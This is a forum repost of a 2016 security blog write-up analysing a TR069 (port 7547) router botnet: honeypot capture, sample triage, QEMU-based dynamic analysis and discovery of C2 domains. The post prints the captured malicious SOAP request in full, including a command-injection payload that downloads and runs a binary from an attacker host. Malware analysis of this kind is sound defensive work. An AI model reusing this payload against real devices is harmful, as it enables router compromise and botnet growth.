请选择 进入手机版 | 继续访问电脑版

技术控

    今日:36| 主题:61288
收藏本版 (1)
最新软件应用技术尽在掌握

[其他] Quick TR069 Botnet Writeup + Triage

[复制链接]
复制你的爱 发表于 2016-11-30 20:25:21
322 1
TL;DR- A wormable exploit for the recently published TR069 is being actively exploited. I pulled down some samples and hacked together a goofy way to perform dynamic analysis with Docker, Qemu, and Tcpdump. The C2 domains are tr069[.]support and tr069[.]online .
  There are several different botnets propogating this worm. I'm only going to document one of them in this post. Also I haven't written a blog post in like a year so here goes nothing.
  Background

  A few articles have crossed my news feeds about the recent TR069 vulnerability. Including the following-
  
       
  • http://arstechnica.com/security/2016/11/notorious-iot-botnets-weaponize-new-flaw-found-in-millions-of-home-routers/   
  • https://blog.fox-it.com/2016/11/28/recent-vulnerability-in-eir-d1000-router-used-to-spread-updated-version-of-mirai-ddos-bot/   
  • https://isc.sans.edu/diary/Port+7547+SOAP+Remote+Code+Execution+Attack+Against+DSL+Modems/21759  
  I figured I'd whip up a web server on a machine I had laying around (something like a raspberry pi) and forward TCP port 7547 through my router, as well as a sniffer for any funky stuff.
  Analysis

  Within about five minutes I was getting hits. The malicious requests have already been documented by some of the aforementioned posts, but the requests look something like this:
  1. POST /UD/act?1 HTTP/1.1  
  2. Host: 127.0.0.1:7547  
  3. User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  
  4. SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers  
  5. Content-Type: text/xml  
  6. Content-Length: 519
  7. <?xml version="1.0"?>  
  8. <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"  
  9. SOAP ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">  
  10. <SOAP-ENV:Body>  
  11. <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">  
  12. <NewNTPServer1>`cd /tmp;wget http://srrys.pw/1;chmod 777 1;./1`</NewNTPServer1>  
  13. <NewNTPServer2></NewNTPServer2>  
  14. <NewNTPServer3></NewNTPServer3>  
  15. <NewNTPServer4></NewNTPServer4>  
  16. <NewNTPServer5></NewNTPServer5>  
  17. </u:SetNTPServers>  
  18. </SOAP-ENV:Body>  
  19. </SOAP-ENV:Envelope>
复制代码
Notice the not-so-subtle command injection in this line-
  1. <NewNTPServer1>`cd /tmp;wget http://srrys.pw/1;chmod 777 1;./1`</NewNTPServer1>
复制代码
  So I routed curl through Tor and downloaded the sample. Also, having reversed a decent amount of shitty IOT worms in my day I went on a hunch and requested hxxp://srrys[.]pw/2 through hxxp://srrys[.]pw/10 as well and got more hits.
  1. $ file *
  2. 1:            ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped  
  3. 2:            ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped  
  4. 3:            ELF 32-bit LSB executable, ARM, version 1, statically linked, stripped  
  5. 4:            ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, stripped  
  6. 5:            ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, stripped  
  7. 6:            ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, stripped  
  8. 7:            ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped
复制代码
...with the following SHA256 hashes...
  1. 971156ec3dca4fa5c53723863966ed165d546a184f3c8ded008b029fd59d6a5a  1  
  2. 9f9c38740568cbe1fbb8171b1ad4221c43790ff106623555868abf76f9672e53  2  
  3. 1fce697993690d41f75e0e6ed522df49d73a038f7e02733ec239c835579c40bf  3  
  4. 828984d1112f52f7f24bbc2b15d0f4cf2646cd03809e648f0d3121a1bdb83464  4  
  5. c597d3b8f61a5b49049006aff5abfe30af06d8979aaaf65454ad2691ef03943b  5  
  6. 046659391b36a022a48e37bd80ce2c3bd120e3fe786c204128ba32aa8d03a182  6  
  7. 5d4e46b3510679dc49ce295b7f448cd69e952d80ba1450f6800be074992b07cc  7
复制代码
  If you've ever tracked IOT threats before this will be a familiar sight. Lots of malware cross compiles for lots of different architectures, like in this example .
   Lets do some basic static analysis. This is usually where I'd bust out my IDA Pro but some fucker stole my laptop recently and I haven't gotten my new license yet. So instead we're going to use Radare2, something equally cool but less familiar to me. Shouts out to the R2 team. Keep doing God's work.
  1. $ r2 1
  2. Warning: Cannot initialize dynamic strings  
  3. -- Change the graph block definition with graph.callblocks, graph.jmpblocks, graph.flagblocks
  4. [0x00400260]> aa
  5. [x] Analyze all flags starting with sym. and entry0 (aa)
复制代码
  I run the aa command to analyze the code/functions, followed by pdf @main to disassemble main in the regular mode and V @main + space bar to disassemble in visual mode.
  ah yes
   

Quick TR069 Botnet Writeup + Triage

Quick TR069 Botnet Writeup + Triage-1-技术控-different,following,published,recently,document

  of course
   

Quick TR069 Botnet Writeup + Triage

Quick TR069 Botnet Writeup + Triage-2-技术控-different,following,published,recently,document

  indeed
   

Quick TR069 Botnet Writeup + Triage

Quick TR069 Botnet Writeup + Triage-3-技术控-different,following,published,recently,document

  oh wait. I don't know MIPS assembly lmfao. But I do know enough assembly to know the file is obfuscated, since the strings are broken and it has reasonably high Shannon entropy.
   

Quick TR069 Botnet Writeup + Triage

Quick TR069 Botnet Writeup + Triage-4-技术控-different,following,published,recently,document

  I sure as shit don't know Motorola m68k or SPARC because I'm a useless millennial.
  My ARM is slightly better, so I could reverse that sample. But all I really want to do is find the C2 (command and control) domains.
  So static analysis is out of the question. Let's try dynamic analysis.
  MIPS dynamic malware analysis on a budget

   The term "dynamic malware analysis" just refers to observing a piece of malwares behavior as it's executing. I'm not a computer engineering major in 2003 so I don't have any MIPS hardware laying around at my house. Instead I'll just emulate a MIPS device with Qemu. Qemu is an emulator, capable of emulating different kinds of hardware. Getting it to work is a pain in the ass sometimes. Fortunately someone Dockerized it .
  Docker is a container technology that makes it stupid easy to run software without worrying about things like configuration. It's awesome.
  So I grabbed the sample and pulled down the docker container with the following command:
  1. $ docker run -it asmimproved/qemu-mips
  2. [email protected]
复制代码
:/project#
   From that shell I pulled down tcpdump into the Docker container and started logging pcap to a file.
  1. [email protected]
复制代码
:/project# tcpdump -w capture.pcap -n -U
   From another Bash prompt I dropped into the terminal, chmod +x 'd the sample, and executed it with the following commands:
  1. $ docker exec -ti peaceful_spence bash
  2. [email protected]
复制代码
:/project# chmod +x 1  [email protected]  :/project# qemu-mipsel ./1
  You also have to worry about opsec and safe analysis and segmentation and all that, but I'll leave that stuff for a smarter reverser to explain. Anyways, the sample detonated, deobfuscated itself in memory, resolved DNS for the C2s, and started scanning the Internet for more devices to compromise. I let it run for a minute or so, pulled down the pcap, and cracked it open. I found scans to random IPs on TCP ports 7547 and 5555.
   My pcap data showed me the two callback domains for command and control are tr069[.]online and tr069.support . Very sneaky.
   

Quick TR069 Botnet Writeup + Triage

Quick TR069 Botnet Writeup + Triage-5-技术控-different,following,published,recently,document

  Whois data shows me both domains were registered earlier today.
  1. $ whois tr069.support
  2. Domain Name: tr069.support  
  3. Domain ID: fec618e5a8fd4ac7bbc5597a04696b08-DONUTS  
  4. WHOIS Server: www.gandi.net/whois  
  5. Referral URL: https://www.gandi.net  
  6. Updated Date: 2016-11-29T10:40:22Z  
  7. Creation Date: 2016-11-29T10:40:22Z  
  8. ...
复制代码
Conclusion

  There's nothing sophisticated about this malware. It probably doesn't affect your network. But the amount of vulnerable devices on the Internet is something you should give a shit about. This is how botnets happen, and botnets are how big DDoS attacks happen.
  I don't have a Yara signature for this malware because nobody uses Yara on embedded devices.
  My recommendations?
  
       
  • Don't give your money to vendors that have a long history of consistently not giving a shit about securing their products   
  • Check if port 7547 is open on your router. If so, probably just buy a new router   
  • If you want to be really paranoid and you run a big website or company, use Shodan to find all the vulnerable devices and go ahead and block them so you don't have to worry about getting caught in the DDoS fallout when it inevitably happens.  
   Hit me up on Twitter or shoot me an email if you have any questions. Thanks for reading my post!
  --Andrew
郭为 发表于 2016-12-17 17:10:30
复制你的爱的等级很高啊!
回复 支持 反对

使用道具 举报

我要投稿

回页顶回复上一篇下一篇回列表
手机版/c.CoLaBug.com ( 粤ICP备05003221号 | 文网文[2010]257号 | 粤公网安备 44010402000842号 )

© 2001-2017 Comsenz Inc.

返回顶部 返回列表